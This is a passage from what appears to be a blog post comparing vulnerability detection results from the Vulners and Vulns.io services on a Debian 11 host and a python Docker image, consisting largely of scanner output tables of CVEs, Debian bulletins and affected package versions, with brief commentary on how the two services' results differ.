grub-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-2206 | grub-pc-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2021-3903 | grub-pc-bin-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-1733 | grub2-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-1851 | iptables-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-19378 | libip4tc2-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9918 | libip6tc2-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42385 | libxtables12-1.8.7-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2581 | krb5-locales-1.18.3-6+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2021-42384 | libgssapi-krb5-2-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39537 | libk5crypto3-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42919 | libkrb5-3-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3973 | libkrb5support0-1.18.3-6+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2129 | libbpf0-1:0.3-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4136 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-15131 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2022-3176 | libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2344 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2021-3697 | libcurl3-gnutls-7.74.0-1.3+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-7246 | libexpat1-2.2.10-2+deb11u3.amd64 < 0:2.2.10-2+deb11u5 |\n | | | | CVE-2020-26560 | libfreetype6-2.10.4+dfsg-1+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-26559 | libgcrypt20-1.8.7-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39686 | libjansson4-2.13.1-1.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1247 | libldap-2.4-2-2.4.57+dfsg-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42382 | libldap-common-2.4.57+dfsg-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2017-17740 | libncurses6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-36325 | libncursesw6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2257 | libtinfo6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1154 | ncurses-base-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2022-0392 | ncurses-bin-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3297 | ncurses-term-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2021-4192 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2287 | libperl5.32-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0408 | perl-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2571 | perl-base-5.32.1-4+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0393 | perl-modules-5.32-5.32.1-4+deb11u2.all >= 0:0.0.0 |\n | | | | CVE-2022-1619 | libpolkit-agent-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-7245 | libpolkit-gobject-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2345 | policykit-1-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1886 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4204 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0943 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2264 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0359 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0572 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0391 | linux-image-5.10.0-17-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-11164 | linux-image-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0413 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3974 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1769 | openssh-client-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42378 | openssh-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0554 | openssh-sftp-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2175 | python3-httplib2-0.18.1-3.all >= 0:0.0.0 |\n | | | | CVE-2022-0685 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2022-1621 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-36690 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010023 | xdg-user-dirs-0.17-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2946 | |\n | | | | CVE-2018-20796 | |\n | | | | CVE-2021-38185 | |\n | | | | CVE-2018-6829 | |\n | | | | CVE-2022-3424 | |\n | | | | CVE-2021-21240 | |\n | | | | CVE-2022-1735 | |\n | | | | CVE-2022-0204 | |\n | | | | CVE-2019-9192 | |\n | | | | CVE-2016-9917 | |\n | | | | CVE-2022-2849 | |\n | | | | CVE-2022-2304 | |\n | | | | CVE-2022-0407 | |\n | | | | CVE-2021-3737 | |\n | | | | CVE-2022-2602 | |\n | | | | CVE-2022-1898 | |\n | | | | CVE-2022-2845 | |\n | | | | CVE-2022-0417 | |\n | | | | CVE-2022-1882 | |\n | | | | CVE-2013-7445 | |\n | | | | CVE-2019-20838 | |\n | | | | CVE-2021-42386 | |\n | | | | CVE-2022-2289 | |\n | | | | CVE-2022-1304 | |\n | | | | CVE-2022-2889 | |\n | | | | CVE-2022-1629 | |\n | | | | CVE-2021-41617 | |\n | | | | CVE-2022-2183 | |\n | | | | CVE-2022-0351 | |\n | | | | CVE-2020-11725 | |\n | | | | CVE-2021-4166 | |\n | | | | CVE-2022-2817 | |\n | | | | CVE-2020-26557 | |\n | | | | CVE-2022-29458 | |\n | | | | CVE-2021-3968 | |\n | | | | CVE-2022-25265 | |\n | | | | CVE-2019-19070 | |\n | | | | CVE-2021-4037 | |\n | | | | CVE-2019-12456 | |\n | | | | CVE-2019-19882 | |\n | | | | CVE-2021-33560 | |\n | | | | CVE-2022-2522 | |\n | | | | CVE-2022-2182 | |\n | | | | CVE-2012-2663 | |\n | | | | CVE-2022-1796 | |\n | | | | CVE-2022-2862 | |\n | | | | CVE-2022-2286 | |\n | | | | CVE-2020-16156 | |\n | | | | CVE-2022-1942 | |\n | | | | CVE-2022-1679 | |\n | | | | CVE-2021-26934 | |\n | | | | CVE-2018-1000500 | |\n | | | | CVE-2008-4609 | |\n | | | | CVE-2019-19449 | |\n | | | | CVE-2021-42381 | |\n | | | | CVE-2022-0368 | |\n | | | | CVE-2022-1720 | |\n | | | | CVE-2022-2125 | |\n | | | | CVE-2021-3847 | |\n | | | | CVE-2022-4139 | |\n | | | | CVE-2022-4378 | |\n | | | | CVE-2022-1620 | |\n | | | | CVE-2021-3872 | |\n | | | | CVE-2022-2126 | |\n | | | | CVE-2022-0934 | |\n | | | | CVE-2021-3928 | |\n | | | | CVE-2022-2000 | |\n | | | | CVE-2021-42383 | |\n | | | | CVE-2022-2816 | |\n | | | | CVE-2021-3984 | |\n | | | | CVE-2019-19814 | |\n | | | | CVE-2022-28733 | |\n | | | | CVE-2021-3927 | |\n | | | | CVE-2020-12362 | |\n | | | | CVE-2018-5709 | |\n | | | | CVE-2011-4116 | |\n | | | | CVE-2022-35737 | |\n | | | | CVE-2022-30065 | |\n | | | | CVE-2022-28734 | |\n | | | | CVE-2018-7738 | |\n | | | | CVE-2021-4187 | |\n | | | | CVE-2021-4069 | |\n | | | | CVE-2016-2568 | |\n | | | | CVE-2022-2343 | |\n | | | | CVE-2021-32078 | |\n | | | | CVE-2021-28861 | |\n | | | | CVE-2021-42380 | |\n | | | | CVE-2022-2819 | |\n | | | | CVE-2022-1785 | |\n | | | | CVE-2021-3864 | |\n | | | | CVE-2022-0443 | |\n | | | | CVE-2022-2124 | |\n | | | | CVE-2021-4019 | |\n | | | | CVE-2022-1968 | |\n | | | | CVE-2022-28391 | |\n | | | | CVE-2022-0500 | |\n | | | | CVE-2022-3775 | |\n | | | | CVE-2022-1897 | |\n | | | | CVE-2022-0261 | |\n | | | | CVE-2021-42379 | |\n | | | | CVE-2022-2285 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 6 | Medium | DSA-5251-1 | CVE-2022-2929 | isc-dhcp-client-4.4.1-2.3.amd64 < 0:4.4.1-2.3+deb11u1 |\n | | | | CVE-2022-2928 | isc-dhcp-common-4.4.1-2.3.amd64 < 0:4.4.1-2.3+deb11u1 |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n | 7 | Medium | no advisory | CVE-2019-12380 | avahi-autoipd-0.8-5.amd64 < 0:0.8-5+deb11u1 |\n | | | | CVE-2021-42376 | bash-5.1-2+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-16234 | bluetooth-5.55-3.1.all >= 0:0.0.0 |\n | | | | CVE-2022-3586 | bluez-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5367 | libbluetooth3-5.55-3.1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1674 | bsdextrautils-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-31879 | bsdutils-1:2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-15919 | eject-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1771 | fdisk-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-36516 | libblkid1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1280 | libfdisk1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3669 | libmount1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-5321 | libsmartcols1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-6755 | libuuid1-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-15719 | mount-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42374 | util-linux-2.36.1-8+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-28736 | busybox-1:1.30.1-6+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9804 | coreutils-8.32-4+b1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-42375 | grub-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2021-3696 | grub-pc-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2018-17977 | grub-pc-bin-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-0156 | grub2-common-2.04-20.amd64 < 0:2.06-3~deb11u1 |\n | | | | CVE-2022-3542 | initramfs-tools-0.140.all >= 0:0.0.0 |\n | | | | CVE-2016-9799 | initramfs-tools-core-0.140.all >= 0:0.0.0 |\n | | | | CVE-2011-3389 | krb5-locales-1.18.3-6+deb11u1.all < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2020-26555 | libgssapi-krb5-2-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2019-16229 | libk5crypto3-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2020-24504 | libkrb5-3-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2017-16231 | libkrb5support0-1.18.3-6+deb11u1.amd64 < 0:1.18.3-6+deb11u3 |\n | | | | CVE-2021-4193 | libbpf0-1:0.3-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2874 | libc-bin-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2012-4542 | libc-l10n-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2022-3715 | libc6-2.31-13+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-4235 | locales-2.31-13+deb11u3.all >= 0:0.0.0 |\n | | | | CVE-2016-9798 | libcurl3-gnutls-7.74.0-1.3+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-0347 | libexpat1-2.2.10-2+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-22923 | libglib2.0-0-2.66.8-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-14159 | libglib2.0-data-2.66.8-1.all >= 0:0.0.0 |\n | | | | CVE-2021-3468 | libgnutls30-3.7.1-5+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5366 | libldap-2.4-2-2.4.57+dfsg-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2012-0039 | libldap-common-2.4.57+dfsg-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2020-14145 | libnss-systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-18018 | libpam-systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4415 | libsystemd0-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-44879 | libudev1-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3502 | systemd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4095 | systemd-sysv-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1420 | systemd-timesyncd-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-3709 | udev-247.3-7.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-15794 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-0213 | libpng16-16-1.6.37-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42328 | libpolkit-agent-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42329 | libpolkit-gobject-1-0-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42898 | policykit-1-0.105-31+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2015-3276 | libprotobuf-c1-1.3.3-1+b2.amd64 >= 0:0.0.0 |\n | | | | CVE-2011-4917 | libpython3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-4756 | libpython3.9-stdlib-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4189 | python3.9-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-16233 | python3.9-minimal-3.9.2-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2231 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4214 | libssl1.1-1.1.1n-0+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2014-9892 | openssl-1.1.1n-0+deb11u3.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-4677 | libxml2-2.9.10+dfsg-6.7+deb11u2.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-4996 | linux-image-5.10.0-16-amd64-5.10.127-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-12364 | linux-image-5.10.0-17-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2598 | linux-image-amd64-5.10.136-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-1000382 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3426 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-0928 | openssh-client-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-2097 | openssh-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-13084 | openssh-sftp-server-1:8.4p1-5+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2008-5135 | os-prober-1.79.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-9803 | ppp-2.4.9-1+1.amd64 >= 0:0.0.0 |\n | | | | CVE-2015-3243 | rsyslog-8.2102.0-2+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-0630 | vim-common-2:8.2.2434-3+deb11u1.all >= 0:0.0.0 |\n | | | | CVE-2007-2768 | vim-tiny-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45941 | xxd-2:8.2.2434-3+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-10723 | wget-1.21-1+deb11u1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-3857 | wpasupplicant-2:2.9.0-21.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3658 | |\n | | | | CVE-2020-26142 | |\n | | | | CVE-2022-2208 | |\n | | | | CVE-2022-2873 | |\n | | | | CVE-2021-45346 | |\n | | | | CVE-2022-4662 | |\n | | | | CVE-2022-0714 | |\n | | | | CVE-2021-4023 | |\n | | | | CVE-2007-5686 | |\n | | | | CVE-2019-6129 | |\n | | | | CVE-2022-3061 | |\n | | | | CVE-2022-0171 | |\n | | | | CVE-2020-12363 | |\n | | | | CVE-2022-33070 | |\n | | | | CVE-2017-13694 | |\n | | | | CVE-2021-3714 | |\n | | | | CVE-2022-1184 | |\n | | | | CVE-2020-26143 | |\n | | | | CVE-2019-1010025 | |\n | | | | CVE-2020-13529 | |\n | | | | CVE-2019-16089 | |\n | | | | CVE-2022-0563 | |\n | | | | CVE-2019-15213 | |\n | | | | CVE-2019-12379 | |\n | | | | CVE-2014-9900 | |\n | | | | CVE-2022-2923 | |\n | | | | CVE-2019-5062 | |\n | | | | CVE-2021-30004 | |\n | | | | CVE-2016-9797 | |\n | | | | CVE-2016-9801 | |\n | | | | CVE-2017-13693 | |\n | | | | CVE-2007-2243 | |\n | | | | CVE-2019-6110 | |\n | | | | CVE-2022-0696 | |\n | | | | CVE-2019-12381 | |\n | | | | CVE-2021-4115 | |\n | | | | CVE-2019-16231 | |\n | | | | CVE-2019-12382 | |\n | | | | CVE-2022-3344 | |\n | | | | CVE-2020-14304 | |\n | | | | CVE-2022-23825 | |\n | | | | CVE-2019-12455 | |\n | | | | CVE-2004-0230 | |\n | | | | CVE-2022-3707 | |\n | | | | CVE-2019-16230 | |\n | | | | CVE-2019-1010024 | |\n | | | | CVE-2020-26140 | |\n | | | | CVE-2016-20012 | |\n | | | | CVE-2021-22922 | |\n | | | | CVE-2021-3759 | |\n | | | | CVE-2022-0480 | |\n | | | | CVE-2011-4916 | |\n | | | | CVE-2005-3660 | |\n | | | | CVE-2010-4563 | |\n | | | | CVE-2016-8660 | |\n | | | | CVE-2008-3234 | |\n | | | | CVE-2013-0340 | |\n | | | | CVE-2019-20794 | |\n | | | | CVE-2016-2781 | |\n | | | | CVE-2019-16232 | |\n | | | | CVE-2021-33061 | |\n | | | | CVE-2022-3628 | |\n | | | | CVE-2018-12928 | |\n | | | | CVE-2022-28735 | |\n | | | | CVE-2018-1121 | |\n | | | | CVE-2022-1462 | |\n | | | | CVE-2022-43552 | |\n | | | | CVE-2016-9800 | |\n | | | | CVE-2019-12378 | |\n | | | | CVE-2021-4149 | |\n | | | | CVE-2011-4915 | |\n | | | | CVE-2020-15802 | |\n | | | | CVE-2021-45940 | |\n | | | | CVE-2022-2153 | |\n | | | | CVE-2022-4543 | |\n | | | | CVE-2021-41229 | |\n | | | | CVE-2008-2544 | |\n | | | | CVE-2016-9802 | |\n | | | | CVE-2022-3606 | |\n | | | | CVE-2022-0400 | |\n | | | | CVE-2022-0319 | |\n | | | | CVE-2022-21505 | |\n | | | | CVE-2021-3733 | |\n | | | | CVE-2021-42373 | |\n | | | | CVE-2021-3695 | |\n +---+----------+-------------+------------------+----------------------------------------------------------------+\n \n\nAnd we can see that the APIs returned different detection results for the DSA/DLA bulletins. The intersection of the sets is empty.\n \n \n **Vulners \u2216 VulnsIO:** 3 {'DLA-3206-1', 'DSA-5287-1', 'DLA-3152-1'}\n **Vulners \u2229 VulnsIO:** 0 set()\n **VulnsIO \u2216 Vulners:** 4 {'DSA-5207-1', 'DSA-5235-1', 'DSA-5236-1', 'DSA-5251-1'}\n\nAt the same time, proofs look convincing at first glance. In this episode, I won&#x27;t go into why there is such a difference in Debian vulnerability detection results. Perhaps the answer is in the operation of the API, and perhaps in the collection of data from the host. I think we will solve this with colleagues from Vulners and Vulns.io. I&#x27;m just pointing out again that vulnerability detection is not that easy and it&#x27;s good when you can use several independent detection engines and compare the results.\n\n### Docker image \n\nNext, I check the vulnerabilities for the Docker image. It is also based on Debian 11.\n \n \n $ python3.8 scanvus.py --audit-service vulners --assessment-type \"docker_image\" --docker-image \"python:3.9.6-slim-bullseye\"\n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: docker_image\n docker_image: python:3.9.6-slim-bullseye\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 105\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for python:3.9.6-slim-bullseye (docker_image, debian 11, linux kernel 5.4.0-135-generic, 105 packages)\n 22 vulnerabilities with levels ['Critical', 'High', 'Medium'] were found\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 1 | Critical | DEBIAN:DLA-2904-1:6B1FD | CVE-2021-45960 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22826 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2022-23852 | |\n | | | | CVE-2022-23990 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 2 | Critical | DEBIAN:DLA-3008-1:E2717 | CVE-2022-1292 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 3 | Critical | DEBIAN:DSA-5073-1:5DBA9 | CVE-2021-45960 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22826 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2022-23852 | |\n | | | | CVE-2022-23990 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 4 | Critical | DEBIAN:DSA-5139-1:0E208 | CVE-2022-1292 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 5 | Critical | DEBIAN:DSA-5169-1:87483 | CVE-2022-2068 | libssl1.1 1.1.1k-1 amd64 < 1.1.1n-0+deb11u3 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1n-0+deb11u3 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 6 | High | DEBIAN:DLA-2935-1:EEAAD | CVE-2022-23852 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u1 |\n | | | | CVE-2022-25235 | |\n | | | | CVE-2022-25236 | |\n | | | | CVE-2022-25313 | |\n | | | | CVE-2022-25315 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 7 | High | DEBIAN:DLA-3022-1:26EFE | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 8 | High | DEBIAN:DLA-3152-1:9B676 | CVE-2016-10228 | libc-bin 2.31-13 amd64 < 2.31-13+deb11u3 |\n | | | | CVE-2019-19126 | libc6 2.31-13 amd64 < 2.31-13+deb11u3 |\n | | | | CVE-2019-25013 | |\n | | | | CVE-2020-10029 | |\n | | | | CVE-2020-1752 | |\n | | | | CVE-2020-27618 | |\n | | | | CVE-2020-6096 | |\n | | | | CVE-2021-27645 | |\n | | | | CVE-2021-3326 | |\n | | | | CVE-2021-33574 | |\n | | | | CVE-2021-35942 | |\n | | | | CVE-2021-3999 | |\n | | | | CVE-2022-23218 | |\n | | | | CVE-2022-23219 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 9 | High | DEBIAN:DSA-4963-1:90BFC | CVE-2021-3711 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 10 | High | DEBIAN:DSA-4963-1:DA7BC | CVE-2021-3711 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 11 | High | DEBIAN:DSA-5085-1:EC5E7 | CVE-2022-25235 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u2 |\n | | | | CVE-2022-25236 | |\n | | | | CVE-2022-25313 | |\n | | | | CVE-2022-25314 | |\n | | | | CVE-2022-25315 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 12 | High | DEBIAN:DSA-5085-2:292DA | CVE-2022-25236 | libexpat1 2.2.10-2 amd64 < 2.2.10-2+deb11u3 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 13 | High | DEBIAN:DSA-5147-1:638F9 | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 14 | Medium | DEBIAN:DLA-2766-1:9EFDC | CVE-2021-3712 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 15 | Medium | DEBIAN:DLA-2771-1:D1964 | CVE-2018-20217 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2018-5729 | libkrb5-3 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2018-5730 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2021-37750 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 16 | Medium | DEBIAN:DLA-2774-1:D8CE0 | CVE-2021-3712 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 17 | Medium | DEBIAN:DLA-2952-1:7651B | CVE-2019-1551 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | CVE-2022-0778 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 18 | Medium | DEBIAN:DLA-2953-1:551CB | CVE-2022-0778 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 19 | Medium | DEBIAN:DLA-3206-1:5481E | CVE-2019-14870 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-3671 | libkrb5-3 1.18.3-6 amd64 < 